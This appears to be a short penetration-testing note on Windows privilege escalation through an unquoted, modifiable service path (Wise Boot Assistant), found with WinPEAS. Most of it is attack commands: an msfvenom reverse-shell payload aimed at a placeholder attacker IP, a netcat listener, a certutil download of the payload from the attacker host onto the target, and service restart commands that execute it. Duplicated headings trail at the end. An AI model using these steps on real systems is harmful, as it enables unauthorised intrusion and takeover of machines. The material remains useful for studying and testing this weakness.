WINPEAS

https://github.com/carlospolop/PEASS-ng

Basis

https://github.com/carlospolop/PEASS-ng/releases

winPEASx64.exe Run WinPEAD

No Quotes and Space Detected

WINPEAS Output

WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess

On attacker machine

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exe
Create a reverse shell with the name of the modifiable service.
nc -lvnp [ATTACKER_PORT]
Open a listener.

On target machine

cd "C:\Program Files (x86)\Wise"
certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/Wise.exe Wise.exe
Download crafted executable and place it where the space is in the vulnerable path.
sc.exe stop WiseBootAssistant
sc.exe query WiseBootAssistant
sc.exe start WiseBootAssistant
Restart the service to execute the crafted one.

Basis#

No Quotes and Space Detected#

WINPEAS Output#

On attacker machine#

On target machine#

Basis

No Quotes and Space Detected

WINPEAS Output

On attacker machine

On target machine